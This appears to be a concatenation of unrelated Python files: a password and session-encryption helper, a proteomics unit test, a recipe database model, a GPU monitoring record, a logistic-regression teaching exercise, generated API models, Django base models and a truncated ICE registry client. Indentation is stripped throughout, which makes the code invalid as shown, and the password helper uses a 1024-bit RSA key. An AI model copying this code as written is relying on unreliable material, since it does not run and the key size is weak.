# create RSA key pair to use during this session to encrypt key passwords
self._session_key_priv = Crypto.PublicKey.RSA.generate(1024)
self._session_key_pub = self._session_key_priv.publickey()
def New(self,length=32):
# generate password of length (default 32) characters from list in self.pwchars
# max length is 128 characters (1024 bits in session RSA key)
maxbytes = self._session_key_priv.size() / 8
if length > maxbytes:
raise ValueError("Length must not be larger than RSA key size")
new_password = []
for i in range(length):
new_password.append(Crypto.Random.random.choice(self.pwchars))
newpw = ''.join(new_password)
return newpw
def SessionEncrypt(self,plainpw):
cipher = Crypto.Cipher.PKCS1_OAEP.new(self._session_key_pub, hashAlgo=Crypto.Hash.SHA256)
message = cipher.encrypt(plainpw.encode('utf-8'))
return message
def SessionDecrypt(self,encpw):
cipher = Crypto.Cipher.PKCS1_OAEP.new(self._session_key_priv, hashAlgo=Crypto.Hash.SHA256)
message = cipher.decrypt(encpw)
return message.decode('utf-8')
def db_create(dbpath):
conn = sqlite3.connect(dbpath)
conn.isolation_level = None
c = conn.cursor()
# set initial version to 0
# so first upgrade doesn't bother backing up
c.execute('PRAGMA user_version = 0')
# enable cell size checking
c.execute('PRAGMA cell_size_check = 1')
# set 4k page size
c.execute('PRAGMA page_size = 4096')
# set UTF-8 encoding
c.execute('PRAGMA encoding = "UTF-8"')
# vacuum to make page size stick
c.execute('VACUUM')
conn.close()
|
"""Unit tests for protein_query module"""
from db_searcher import DbSearcher
from protein_query import ProteinSearcher
import os
import pandas as pd
TEST_FOLDER = os.path.dirname(__file__)
DB_SEARCHER_DATA_FOLDER = os.path.join(TEST_FOLDER,"db_searcher_data")
# DB_SEARCHER_DATA_FOLDER is a folder exclusive for this unit test
# It is expected to contain 2 files (msML and fasta)
# might not work, when more than 2 files are there
fasta_file,mzml_file=([file for file in os.listdir(DB_SEARCHER_DATA_FOLDER)])
# Absolute paths
mzml_file_path = os.path.join(DB_SEARCHER_DATA_FOLDER, mzml_file)
fasta_file_path = os.path.join(DB_SEARCHER_DATA_FOLDER, fasta_file)
class TestProteinSearcher:
"""Unit tests for the ProteinSearcher class"""
def test_protein_query(self):
"""unit tests to ensure the correct mapping of peptides to proteins"""
db_instance = DbSearcher(mzml_file=mzml_file_path, fasta_file=fasta_file_path)
results = db_instance.db_searcher()
peptide_df = db_instance.peptide_info_df
protein_instance = ProteinSearcher(peptide_list=peptide_df)
protein_instance.download_protein_info()
protein_atlas_results = protein_instance.protein_matches
assert isinstance(protein_atlas_results, dict)
# print([i for i in protein_atlas_results.keys()])
assert [i for i in protein_atlas_results.keys()] == ["DFASSGGYVLHLHR", "IALSRPNVEVVALNDPFITNDYAAYMFK",
"RPGADSDIGGFGGLFDLAQAGFR"]
assert protein_atlas_results["DFASSGGYVLHLHR"] == []
assert protein_atlas_results["RPGADSDIGGFGGLFDLAQAGFR"] == []
assert protein_atlas_results["IALSRPNVEVVALNDPFITNDYAAYMFK"] == [{'location': '19',
'peptide': 'LALSRPNVEVVALNDPFLTNDYAAYMFK',
'protein': 'Microbe_sp|P00359|G3P3_YEAST'}]
|
import datetime
from datetime import date
from typing import List
import sqlalchemy as sa
import sqlalchemy.orm as orm
from mealie.db.models.model_base import BaseMixins, SqlAlchemyBase
from mealie.db.models.recipe.api_extras import ApiExtras
from mealie.db.models.recipe.category import Category, recipes2categories
from mealie.db.models.recipe.ingredient import RecipeIngredient
from mealie.db.models.recipe.instruction import RecipeInstruction
from mealie.db.models.recipe.note import Note
from mealie.db.models.recipe.nutrition import Nutrition
from mealie.db.models.recipe.tag import Tag, recipes2tags
from mealie.db.models.recipe.tool import Tool
from sqlalchemy.ext.orderinglist import ordering_list
from sqlalchemy.orm import validates
class RecipeModel(SqlAlchemyBase, BaseMixins):
__tablename__ = "recipes"
# Database Specific
id = sa.Column(sa.Integer, primary_key=True)
# General Recipe Properties
name = sa.Column(sa.String, nullable=False)
description = sa.Column(sa.String)
image = sa.Column(sa.String)
totalTime = sa.Column(sa.String)
prepTime = sa.Column(sa.String)
performTime = sa.Column(sa.String)
cookTime = sa.Column(sa.String)
recipeYield = sa.Column(sa.String)
recipeCuisine = sa.Column(sa.String)
tools: List[Tool] = orm.relationship("Tool", cascade="all, delete-orphan")
nutrition: Nutrition = orm.relationship("Nutrition", uselist=False, cascade="all, delete-orphan")
recipeCategory: List = orm.relationship("Category", secondary=recipes2categories, back_populates="recipes")
recipeIngredient: List[RecipeIngredient] = orm.relationship(
"RecipeIngredient",
cascade="all, delete-orphan",
order_by="RecipeIngredient.position",
collection_class=ordering_list("position"),
)
recipeInstructions: List[RecipeInstruction] = orm.relationship(
"RecipeInstruction",
cascade="all, delete-orphan",
order_by="RecipeInstruction.position",
collection_class=ordering_list("position"),
)
# Mealie Specific
slug = sa.Column(sa.String, index=True, unique=True)
tags: List[Tag] = orm.relationship("Tag", secondary=recipes2tags, back_populates="recipes")
dateAdded = sa.Column(sa.Date, default=date.today)
notes: List[Note] = orm.relationship("Note", cascade="all, delete-orphan")
rating = sa.Column(sa.Integer)
orgURL = sa.Column(sa.String)
extras: List[ApiExtras] = orm.relationship("ApiExtras", cascade="all, delete-orphan")
@validates("name")
def validate_name(self, key, name):
assert name != ""
return name
def __init__(
self,
session,
name: str = None,
description: str = None,
image: str = None,
recipeYield: str = None,
recipeIngredient: List[str] = None,
recipeInstructions: List[dict] = None,
recipeCuisine: str = None,
totalTime: str = None,
prepTime: str = None,
nutrition: dict = None,
tools: list[str] = [],
performTime: str = None,
slug: str = None,
recipeCategory: List[str] = None,
tags: List[str] = None,
dateAdded: datetime.date = None,
notes: List[dict] = None,
rating: int = None,
orgURL: str = None,
extras: dict = None,
) -> None:
self.name = name
self.description = description
self.image = image
self.recipeCuisine = recipeCuisine
self.nutrition = Nutrition(**nutrition) if self.nutrition else Nutrition()
self.tools = [Tool(tool=x) for x in tools] if tools else []
self.recipeYield = recipeYield
self.recipeIngredient = [RecipeIngredient(ingredient=ingr) for ingr in recipeIngredient]
self.recipeInstructions = [
RecipeInstruction(text=instruc.get("text"), type=instruc.get("@type", None))
for instruc in recipeInstructions
]
self.totalTime = totalTime
self.prepTime = prepTime
self.performTime = performTime
self.recipeCategory = [Category.create_if_not_exist(session=session, name=cat) for cat in recipeCategory]
# Mealie Specific
self.tags = [Tag.create_if_not_exist(session=session, name=tag) for tag in tags]
self.slug = slug
self.dateAdded = dateAdded
self.notes = [Note(**note) for note in notes]
self.rating = rating
self.orgURL = orgURL
self.extras = [ApiExtras(key=key, value=value) for key, value in extras.items()]
def update(
self,
session,
name: str = None,
description: str = None,
image: str = None,
recipeYield: str = None,
recipeIngredient: List[str] = None,
recipeInstructions: List[dict] = None,
recipeCuisine: str = None,
totalTime: str = None,
tools: list[str] = [],
prepTime: str = None,
performTime: str = None,
nutrition: dict = None,
slug: str = None,
recipeCategory: List[str] = None,
tags: List[str] = None,
dateAdded: datetime.date = None,
notes: List[dict] = None,
rating: int = None,
orgURL: str = None,
extras: dict = None,
):
"""Updated a database entry by removing nested rows and rebuilds the row through the __init__ functions"""
self.__init__(
session=session,
name=name,
description=description,
image=image,
recipeYield=recipeYield,
recipeIngredient=recipeIngredient,
recipeInstructions=recipeInstructions,
totalTime=totalTime,
recipeCuisine=recipeCuisine,
prepTime=prepTime,
performTime=performTime,
nutrition=nutrition,
tools=tools,
slug=slug,
recipeCategory=recipeCategory,
tags=tags,
dateAdded=dateAdded,
notes=notes,
rating=rating,
orgURL=orgURL,
extras=extras,
)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""A module for data of monitor."""
import json
import numbers
from datetime import datetime
from superbench.benchmarks import ReduceType
class MonitorRecord:
"""Record class to save all monitoring data."""
reduce_ops = {
'gpu_temperature': ReduceType.MAX,
'gpu_power_limit': ReduceType.MIN,
'gpu_corrected_ecc': ReduceType.LAST,
'gpu_uncorrected_ecc': ReduceType.LAST,
'gpu_remap': ReduceType.LAST,
}
def __init__(self):
"""Constructor."""
self.__time = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
self.__cpu_usage = None
self.__mem_used = None
self.__mem_total = None
self.__gpu_usage = list()
self.__gpu_temperature = list()
self.__gpu_power_limit = list()
self.__gpu_mem_used = list()
self.__gpu_mem_total = list()
self.__gpu_corrected_ecc = list()
self.__gpu_uncorrected_ecc = list()
self.__gpu_remap_info = list()
self.__net_receive = dict()
self.__net_transmit = dict()
@property
def time(self):
"""Decoration function to access __time."""
return self.__time
@property
def cpu_usage(self):
"""Decoration function to access __cpu_usage."""
return self.__cpu_usage
@cpu_usage.setter
def cpu_usage(self, usage):
"""Set the cpu usage.
Args:
usage (float): cpu usage.
"""
self.__cpu_usage = usage
@property
def mem_used(self):
"""Decoration function to access __mem_used."""
return self.__mem_used
@mem_used.setter
def mem_used(self, mem_used):
"""Set the used host memory, unit: MB.
Args:
mem_used (float): used host memory.
"""
self.__mem_used = mem_used
@property
def mem_total(self):
"""Decoration function to access __mem_total."""
return self.__mem_total
@mem_total.setter
def mem_total(self, mem_total):
"""Set the total host memory, unit: MB.
Args:
mem_total (float): total host memory.
"""
self.__mem_total = mem_total
@property
def gpu_usage(self):
"""Decoration function to access __gpu_usage."""
return self.__gpu_usage
@gpu_usage.setter
def gpu_usage(self, gpu_usage):
"""Set the gpu usage.
Args:
gpu_usage (list): list of gpu usage.
"""
self.__gpu_usage = gpu_usage
@property
def gpu_temperature(self):
"""Decoration function to access __gpu_temperature."""
return self.__gpu_temperature
@gpu_temperature.setter
def gpu_temperature(self, gpu_temperature):
"""Set the gpu temperature, unit: Celsius.
Args:
gpu_temperature (list): list of gpu temperature.
"""
self.__gpu_temperature = gpu_temperature
@property
def gpu_power_limit(self):
"""Decoration function to access __gpu_power_limit."""
return self.__gpu_power_limit
@gpu_power_limit.setter
def gpu_power_limit(self, gpu_power_limit):
"""Set the gpu power limit, unit: Watt.
Args:
gpu_power_limit (list): list of gpu power limit.
"""
self.__gpu_power_limit = gpu_power_limit
@property
def gpu_mem_used(self):
"""Decoration function to access __gpu_mem_used."""
return self.__gpu_mem_used
@gpu_mem_used.setter
def gpu_mem_used(self, gpu_mem_used):
"""Set the used gpu memory, unit: MB.
Args:
gpu_mem_used (list): list of used gpu memory.
"""
self.__gpu_mem_used = gpu_mem_used
@property
def gpu_mem_total(self):
"""Decoration function to access __gpu_mem_total."""
return self.__gpu_mem_total
@gpu_mem_total.setter
def gpu_mem_total(self, gpu_mem_total):
"""Set the total gpu memory, unit: MB.
Args:
gpu_mem_total (list): list of total gpu memory.
"""
self.__gpu_mem_total = gpu_mem_total
@property
def gpu_corrected_ecc(self):
"""Decoration function to access __gpu_corrected_ecc."""
return self.__gpu_corrected_ecc
@gpu_corrected_ecc.setter
def gpu_corrected_ecc(self, gpu_corrected_ecc):
"""Set the count of corrected (single bit) ecc error.
Args:
gpu_corrected_ecc (list): list of gpu corrected ecc error.
"""
self.__gpu_corrected_ecc = gpu_corrected_ecc
@property
def gpu_uncorrected_ecc(self):
"""Decoration function to access __gpu_uncorrected_ecc."""
return self.__gpu_uncorrected_ecc
@gpu_uncorrected_ecc.setter
def gpu_uncorrected_ecc(self, gpu_uncorrected_ecc):
"""Set the count of uncorrected (double bit) ecc error.
Args:
gpu_uncorrected_ecc (list): list of gpu uncorrected ecc error.
"""
self.__gpu_uncorrected_ecc = gpu_uncorrected_ecc
@property
def gpu_remap_info(self):
"""Decoration function to access __gpu_remap_info."""
return self.__gpu_remap_info
@gpu_remap_info.setter
def gpu_remap_info(self, gpu_remap_info):
"""Set the gpu remap_info.
Args:
gpu_remap_info (list): list of gpu remap_info.
"""
self.__gpu_remap_info = gpu_remap_info
@property
def net_receive(self):
"""Decoration function to access __net_receive."""
return self.__net_receive
@net_receive.setter
def net_receive(self, net_receive):
"""Set the network receive bandwidth, unit: Bytes/s.
Args:
net_receive (dict): receive bandwidth for all devices.
"""
self.__net_receive = net_receive
@property
def net_transmit(self):
"""Decoration function to access __net_transmit."""
return self.__net_transmit
@net_transmit.setter
def net_transmit(self, net_transmit):
"""Set the network transmit bandwidth, unit: Bytes/s.
Args:
net_transmit (dict): transmit bandwidth for all devices.
"""
self.__net_transmit = net_transmit
def to_string(self):
"""Serialize the MonitorRecord object to string.
Return:
The serialized string of MonitorRecord object.
"""
formatted_obj = dict()
for key, value in self.__dict__.items():
# The name of internal member is like '_MonitorRecord__name'.
# For the result object return to caller, need to reformat the 'name' as key.
formatted_key = key.split('__')[1]
if isinstance(value, numbers.Number) or isinstance(value, str):
formatted_obj[formatted_key] = value
elif isinstance(value, list):
for i, item in enumerate(value):
if isinstance(item, numbers.Number):
formatted_obj['{}:{}'.format(formatted_key, i)] = item
elif isinstance(item, dict):
for k, v in item.items():
formatted_obj['{}:{}'.format(k, i)] = v
elif isinstance(value, dict):
for k, v in value.items():
formatted_obj[k] = v
return json.dumps(formatted_obj)
|
# Sascha Spors, Professorship Signal Theory and Digital Signal Processing,
# Institute of Communications Engineering (INT), Faculty of Computer Science
# and Electrical Engineering (IEF), University of Rostock, Germany
#
# Data Driven Audio Signal Processing - A Tutorial with Computational Examples
# Feel free to contact lecturer frank.schultz@uni-rostock.de
#
# Exercise 11: Binary logistic regression model with just one layer
# Training using gradient descent and forward/backward propagation
# following the derivations and coding conventions from the brilliant
# course https://www.coursera.org/learn/neural-networks-deep-learning
# cf. especially week 2
# compare against model that is trained by TensorFlow
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.keras as keras
print('TF version', tf.__version__, # we used 2.4.3
'\nKeras version', keras.__version__) # we used 2.4.0
# rng = np.random.RandomState(1) # for debug
rng = np.random.RandomState()
verbose = 1 # plot training status
def my_sigmoid(z):
return 1 / (1 + np.exp(-z))
def cost(y_true, y_pred):
# vectorized loss
L = - (y_true*np.log(y_pred) + (1-y_true)*np.log(1-y_pred))
# cost function as average of all entries in L
J = np.mean(L)
return(J)
def evaluate(y_true, y_pred):
# actually not nice, since we generally overwrite y_pred
y_pred[y_pred < 0.5], y_pred[y_pred >= 0.5] = 0, 1
# which might get dangerous if we need original data outside the function
# therefore we should call evaluate(np.copy(), np.copy())
# inverted logic to be consistent with the TF confusion matrix
# of labels starting with 0:
# label positive == 0
# label negative == 1
# confusion matrix (row = actual label, column = predicted label):
# [TP FN] = [0,0 0,1<-this 1 is negative label and hene false]
# [FP TN] = [1,0 1,1]
TP = np.sum(np.logical_and(np.logical_not(y_true), np.logical_not(y_pred)))
TN = np.sum(np.logical_and(y_true, y_pred))
FN = np.sum(np.logical_xor(y_true[y_true == 0], y_pred[y_true == 0]))
FP = np.sum(np.logical_xor(y_true[y_true == 1], y_pred[y_true == 1]))
cm = np.array([[TP, FN], [FP, TN]])
n_cm = cm / np.sum(np.sum(cm))
# sensitivity, recall, hit rate, or true positive rate (TPR)
recall = TP / (TP + FN)
# specificity, selectivity or true negative rate (TNR)
TN / (TN + FP)
# precision or positive predictive value (PPV)
precision = TP / (TP + FP)
# negative predictive value (NPV)
TN / (TN + FN)
# accuracy (ACC)
accuracy = (TP + TN) / (TP + TN + FP + FN)
# balanced F-score, F1 score
F1_score = 2 / (1/precision + 1/recall) # harmonic mean
return cm, n_cm, precision, recall, F1_score, accuracy
# gradient descent hyper parameters
# set up to see how things evolve
# in practice do hyper parameter tuning, see exercise 12
step_size = 0.25
steps = 500
# we create some data
m = 100000 # data examples
nx = 2 # number of features
train_size = 0.8 # 80% are used for training
X, Y = make_classification(n_samples=m,
n_features=nx, n_informative=nx,
n_redundant=0,
n_classes=2, n_clusters_per_class=1,
class_sep=1,
flip_y=1e-2,
random_state=8)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,
train_size=train_size,
random_state=None)
m_train = X_train.shape[0]
print('\nm_train', m_train)
X = X_train.T # our implementation needs transposed data
Y = np.expand_dims(Y_train, axis=0)
# X.shape = (nx, m_train)
# Y.shape = (1, m_train)
print('X train dim', X.shape, 'Y train dim', Y.shape)
# TRAINING PHASE
# OUR MODEL
# we init weights and bias with uniform PDF noise
w = (rng.rand(nx, 1) - 1/2) * 2
b = (rng.rand(1, 1) - 1/2) * 2
# we do the batch gradient descent, i.e. take all data at once per epoch
# to calc new weights
for step in range(steps):
# forward propagation = calc actual prediction, i.e. the model output
# using the current weights and bias:
Z = np.dot(w.T, X) + b # forward step 1 = inner product + bias
A = my_sigmoid(Z) # forward step 2 = activation function
if verbose:
print('epoch', step, '/', steps, ', our cost on training data',
cost(Y, A))
# backward propagation, start at the output from model and subsequently
# move back to the model input
# vectorized
da = -Y / A + (1-Y) / (1-A) # step1 -> dL/da
dz = da * A*(1-A) # step 2 -> (dL/da) * da/dz
dw = np.dot(X, dz.T) / m_train # step 3 -> dL/dw = (dL/da * da/dz) * dz/dw
db = np.mean(dz) # dL/dw = dL/da * da/dz * dz/db
# gradient descent update rule
w = w - step_size * dw
b = b - step_size * db
J_train = cost(Y, A)
cm_train, n_cm_train, precision_train, recall_train,\
F1_score_train, accuracy_train = evaluate(np.copy(Y), np.copy(A))
# TensorFlow MODEL
initializer = keras.initializers.RandomUniform(minval=0., maxval=1.)
optimizer = keras.optimizers.SGD(learning_rate=step_size, momentum=0)
# we can also use some other gradient descent methods:
# optimizer = keras.optimizers.Adam()
# optimizer = keras.optimizers.SGD()
loss = keras.losses.BinaryCrossentropy(from_logits=False, label_smoothing=0)
metrics = [keras.metrics.BinaryCrossentropy(),
keras.metrics.BinaryAccuracy(),
keras.metrics.Precision(),
keras.metrics.Recall()]
input = keras.Input(shape=(nx,))
output = keras.layers.Dense(1, kernel_initializer=initializer,
activation='sigmoid')(input)
# we can also use default kernel_initializer:
# output = keras.layers.Dense(1, activation='sigmoid')(input)
model = keras.Model(inputs=input, outputs=output)
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
model.fit(X.T, Y.T, batch_size=m_train, epochs=steps, verbose=verbose)
# explicit usage of epochs, batch_size hard coded:
# model.fit(X.T, Y.T, epochs=20, batch_size=100, verbose=verbose)
results_train_tf = model.evaluate(X.T, Y.T, batch_size=m_train,
verbose=verbose)
# print results of our model vs. TF model
print(model.summary())
print('\n\nmetrics on training data:')
print('our cost', J_train)
print('TF cost ', results_train_tf[0])
print('our accuray', accuracy_train)
print('TF accuracy', results_train_tf[2])
print('our precision', precision_train)
print('TF precision ', results_train_tf[3])
print('our recall', recall_train)
print('TF recall ', results_train_tf[4])
print('our F1_score', F1_score_train*100, '%')
print('our confusion matrix\n[TP FN]\n[FP TN] =\n',
n_cm_train*100, '%')
Y_pred = model.predict(X_train)
Y_pred[Y_pred < 0.5], Y_pred[Y_pred >= 0.5] = 0, 1
cm = tf.math.confusion_matrix(labels=Y_train,
predictions=Y_pred,
num_classes=2)
print('TF confusion matrix')
print(cm / m_train * 100)
print('\nmodel weights:')
print('ours\nw', w.T,
'\nb', b)
print('TF\nw', model.get_weights()[0].T,
'\nb', model.get_weights()[1])
# TESTING PHASE
# we check model performance on !! unseen !! test data
m_test = X_test.shape[0]
print('\nm_test', m_test)
X = X_test.T # our implementation needs transposed data
Y = np.expand_dims(Y_test, axis=0)
# X.shape = (nx, m_test)
# Y.shape = (1, m_test)
print('X test dim', X.shape, 'Y test dim', Y.shape)
# OUR MODEL
# do model prediction == forward propagation using test data
A = my_sigmoid(np.dot(w.T, X) + b) # Yhat
J_test = cost(Y, A)
cm_test, n_cm_test, precision_test, recall_test,\
F1_score_test, accuracy_test = evaluate(np.copy(Y), np.copy(A))
# TensorFlow MODEL
results_test_tf = model.evaluate(X.T, Y.T, batch_size=m_test,
verbose=verbose)
# print results of our model vs. TF model
print('\n\nmetrics on test data:')
print('our cost', J_test)
print('TF cost ', results_test_tf[0])
print('our accuray', accuracy_test)
print('TF accuracy', results_test_tf[2])
print('our precision', precision_test)
print('TF precision ', results_test_tf[3])
print('our recall', recall_test)
print('TF recall ', results_test_tf[4])
print('our F1_score', F1_score_test*100, '%')
print('our confusion matrix\n[TP FN]\n[FP TN] =\n',
n_cm_test*100, '%')
Y_pred = model.predict(X_test)
Y_pred[Y_pred < 0.5], Y_pred[Y_pred >= 0.5] = 0, 1
cm = tf.math.confusion_matrix(labels=Y_test,
predictions=Y_pred,
num_classes=2)
print('TF confusion matrix')
print(cm / m_test * 100)
# plot
if nx == 2: # 2D plot of data and classification line
f1 = np.arange(-6, 6, 0.1)
f2 = np.arange(-6, 6, 0.1)
xv, yv = np.meshgrid(f1, f2)
tmp = my_sigmoid(w[0]*xv + w[1]*yv + b)
tmp[tmp < 0.5], tmp[tmp >= 0.5] = 0, 1
plt.figure(figsize=(10, 10))
plt.subplot(2, 1, 1)
plt.plot(X_train[Y_train == 0, 0], X_train[Y_train == 0, 1], 'C0o', ms=1)
plt.plot(X_train[Y_train == 1, 0], X_train[Y_train == 1, 1], 'C1o', ms=1)
plt.contourf(f1, f2, tmp, cmap='RdBu_r')
plt.axis('equal')
plt.colorbar()
plt.title(X_train.shape)
plt.xlabel('feature 1')
plt.ylabel('feature 2')
plt.subplot(2, 1, 2)
plt.plot(X_test[Y_test == 0, 0], X_test[Y_test == 0, 1], 'C0o', ms=1)
plt.plot(X_test[Y_test == 1, 0], X_test[Y_test == 1, 1], 'C1o', ms=1)
plt.contourf(f1, f2, tmp, cmap='RdBu_r')
plt.axis('equal')
plt.colorbar()
plt.title(X_test.shape)
plt.xlabel('feature 1')
plt.ylabel('feature 2')
plt.savefig('exercise11_binary_logistic_regression_tf.png')
if False: # check our confusion matrix handling
# inverted logic!
# label positive == 0
# label negative == 1
# TP
y_true = np.array([0])
y_pred = np.array([0])
cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
print('TP', cm)
# FN
y_true = np.array([0])
y_pred = np.array([1]) # <- 1...neg label, which is false against y_true=0
cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
print('FN', cm)
# FP
y_true = np.array([1])
y_pred = np.array([0]) # <- 0...pos label which is false against y_true=1
cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
print('FP', cm)
# TN
y_true = np.array([1])
y_pred = np.array([1])
cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
print('TN', cm)
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OrderItemEdiLot(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'lot_expiration': 'str',
'lot_number': 'str',
'lot_quantity': 'int'
}
attribute_map = {
'lot_expiration': 'lot_expiration',
'lot_number': 'lot_number',
'lot_quantity': 'lot_quantity'
}
def __init__(self, lot_expiration=None, lot_number=None, lot_quantity=None):
"""
OrderItemEdiLot - a model defined in Swagger
"""
self._lot_expiration = None
self._lot_number = None
self._lot_quantity = None
self.discriminator = None
if lot_expiration is not None:
self.lot_expiration = lot_expiration
if lot_number is not None:
self.lot_number = lot_number
if lot_quantity is not None:
self.lot_quantity = lot_quantity
@property
def lot_expiration(self):
"""
Gets the lot_expiration of this OrderItemEdiLot.
Log expiration
:return: The lot_expiration of this OrderItemEdiLot.
:rtype: str
"""
return self._lot_expiration
@lot_expiration.setter
def lot_expiration(self, lot_expiration):
"""
Sets the lot_expiration of this OrderItemEdiLot.
Log expiration
:param lot_expiration: The lot_expiration of this OrderItemEdiLot.
:type: str
"""
self._lot_expiration = lot_expiration
@property
def lot_number(self):
"""
Gets the lot_number of this OrderItemEdiLot.
Lot number
:return: The lot_number of this OrderItemEdiLot.
:rtype: str
"""
return self._lot_number
@lot_number.setter
def lot_number(self, lot_number):
"""
Sets the lot_number of this OrderItemEdiLot.
Lot number
:param lot_number: The lot_number of this OrderItemEdiLot.
:type: str
"""
self._lot_number = lot_number
@property
def lot_quantity(self):
"""
Gets the lot_quantity of this OrderItemEdiLot.
Lot quantity
:return: The lot_quantity of this OrderItemEdiLot.
:rtype: int
"""
return self._lot_quantity
@lot_quantity.setter
def lot_quantity(self, lot_quantity):
"""
Sets the lot_quantity of this OrderItemEdiLot.
Lot quantity
:param lot_quantity: The lot_quantity of this OrderItemEdiLot.
:type: int
"""
self._lot_quantity = lot_quantity
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, OrderItemEdiLot):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
from django.conf import settings
from django.db import models
from django.urls import reverse
from . import global_request
class AuditedModel(models.Model):
"""
CHECK IF THIS IS TRUE
CAVEAT 1:
If using a custom user model, add the following line to the top:
from api.models.user_profile import User # noqa: F401
It's needed for get_model in settings.
CAVEAT 2:
All api calls that add or edit a line to your database should be Authenticated.
If you're not doing that then you are ASKING for trouble.
"""
create_at = models.DateTimeField(auto_now_add=True)
create_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT, related_name='%(class)s_create',
null=True, blank=True)
update_at = models.DateTimeField(auto_now=True)
update_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT, related_name='%(class)s_update',
null=True, blank=True)
class Meta:
abstract = True
# By default, any model that inherits from `TimestampedModel` should
# be ordered in reverse-chronological order. We can override this on a
# per-model basis as needed, but reverse-chronological is a good
# default ordering for most models.
ordering = ['-create_at', '-update_at']
def save(self, *args, **kwargs):
"""
Store create_user if it's not assigned yet (first time the object is
saved() and overwrite the update_user
"""
current_user = global_request.get_current_user()
if not self.create_by:
self.create_by = current_user
self.update_by = current_user
return super(AuditedModel, self).save(*args, **kwargs)
class PersistentModelQuerySet(models.QuerySet):
"""Model implementing QuerySet for PersistentModel: allows soft-deletion"""
def delete(self):
self.update(deleted=True)
class PersistentModelManager(models.Manager):
"""Model implementing default manager for PersistenModel: filters 'deleted' elements"""
def inactive(self):
return self.model.objects.filter(deleted=True)
def active(self):
return self.model.objects.filter(deleted=False)
def filter(self, *args, **kwargs):
active_only = kwargs.pop('active_only', True)
qs = super().filter(*args, **kwargs)
if active_only:
return qs.filter(deleted=False)
return qs
def all(self, *args, **kwargs):
active_only = kwargs.pop('active_only', True)
qs = super().all(*args, **kwargs)
if active_only:
return qs.filter(deleted=False)
return qs
def get_queryset(self, **kwargs):
return PersistentModelQuerySet(self.model, using=self._db)
class PersistentModel(models.Model):
"""Abstract class allowing soft-deletion"""
deleted = models.BooleanField(default=False)
objects = PersistentModelManager()
class Meta:
abstract = True
def delete(self):
self.deleted = True
self.save()
class CodeModel(models.Model):
"""
Agregamos esta variable solo para mostrar algun codigo, que lo formamos
con el id del objeto.
Entonces por ejemplo si tenemos una lista de objetos, y necesitamos nombrarlos
podemos usar esto.
Por ejemplo, tenemos una clase class Alumno que extiende esta clase y sobre
escribimos esta variable como _CODE_FORMAT = 'AL-{id:06d}', y al imprimir
una lista de alumnos mostramos el code, veremos algo como
AL-000001, AL-000002, . . .
"""
_CODE_FORMAT = 'code-{id:06d}'
class Meta:
abstract = True
@property
def code(self):
# provided the pk exists
return self._CODE_FORMAT.format(id=self.pk)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
"""
Defines classes and utility methods used to communicate with the Index of Composable Elements
(ICE), a.k.a. the "registry of parts". This API is designed to minimize dependencies on other
libraries (e.g. Django model objects) so that it can be used from any part of the EDD codebase,
including remotely-executed code, with a minimum of network traffic and install process. For
example, many of the methods in the IceApi class are called from Celery tasks that may execute on
a physically separate server from EDD itself, where Django model objects shouldn't be passed over
the network.
"""
import itertools
import json
import logging
import re
import requests
from django.conf import settings
from requests.compat import urlparse
from jbei.rest.api import RestApiClient
from jbei.rest.sessions import Session
logger = logging.getLogger(__name__)
# try to grab values from settings loaded above; use sane defaults
# request and read timeout, respectively, in seconds
ICE_REQUEST_TIMEOUT = getattr(settings, "ICE_REQUEST_TIMEOUT", (10, 10))
ICE_URL = getattr(settings, "ICE_URL", "https://registry.jbei.org")
ICE_SECRET_KEY = getattr(settings, "ICE_SECRET_KEY", None)
class IceApiException(Exception):
def __init__(self, message="", code=requests.codes.internal_server_error):
super().__init__(message)
self.code = code
class IceObject:
"""Base class for JSON data from ICE mapped into Python objects."""
def __init__(self, **kwargs):
# just map all the arguments onto self
self.__dict__.update(**kwargs)
class Entry(IceObject):
"""The Python representation of an ICE entry."""
KEYWORD_CHANGES = {
"accessPermissions": "access_permissions",
"basePairCount": "bp_count",
"bioSafetyLevel": "biosafety_level",
"canEdit": "can_edit",
"creationTime": "creation_time",
"creatorEmail": "creator_email",
"creatorId": "creator_id",
"featureCount": "feature_count",
"fundingSource": "funding_source",
"hasAttachment": "has_attachment",
"hasOriginalSequence": "has_original_sequence",
"hasSample": "has_sample",
"hasSequence": "has_sequence",
"intellectualProperty": "intellectual_property",
"longDescription": "long_description",
"modificationTime": "mod_time",
"ownerEmail": "owner_email",
"ownerId": "owner_id",
"partId": "part_id",
"principalInvestigator": "pi_name",
